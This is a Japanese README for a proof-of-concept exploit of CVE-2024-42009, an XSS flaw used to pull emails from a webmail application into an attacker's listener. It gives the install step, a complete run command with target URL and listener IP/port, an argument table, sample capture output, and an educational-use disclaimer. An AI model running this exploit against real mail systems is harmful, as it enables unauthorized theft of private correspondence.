
この概念実証(PoC)は、CVE-2024-42009のエクスプロイトを示すもので、クロスサイトスクリプティング(XSS)の脆弱性を利用してターゲットのウェブメールアプリケーションからメールを抽出します。攻撃は、メールコンテンツを攻撃者の制御するリスナーに流出させる悪意のあるペイロードを注入します。
pip install requests beautifulsoup4
必要な引数を指定してスクリプトを実行します:
python exploit.py -fu [email protected] -tu [email protected] -u http://target.com/contact -ip YOUR_IP -p 1337
| 引数 | 説明 |
|---|---|
-fu, --from-user | 送信者のメールアドレス |
-tu, --to-user | 受信者のメールアドレス |
-u, --target-url | ターゲットのウェブメールURL |
-ip, --server-ip | 攻撃者のリスナーIPアドレス |
-p, --server-port | リスナーのポート(デフォルト: 1337) |
[*] CVE-2024-42009 PoC: Listening on 192.168.1.100:1337...
[*] Sending payload for UID 1...
[+] Payload sent for UID 1 (Status: 200)
[+] Captured Email Content:
Hello, this is a test email!
私は、このGitHubリポジトリでホストされている脆弱性およびそれに対応するすべてのエクスプロイトのクレジット/所有権/開示を主張しません。すべてのクレジットは、それを発見した研究者に帰属します。私はインターネット上のデータに基づいて脆弱性を再現するためのPoCを作成したに過ぎません。 このPoCは教育および研究目的のみに使用されます。同意なしにシステムに対して許可のないテストを行うことは違法です。責任を持って使用してください!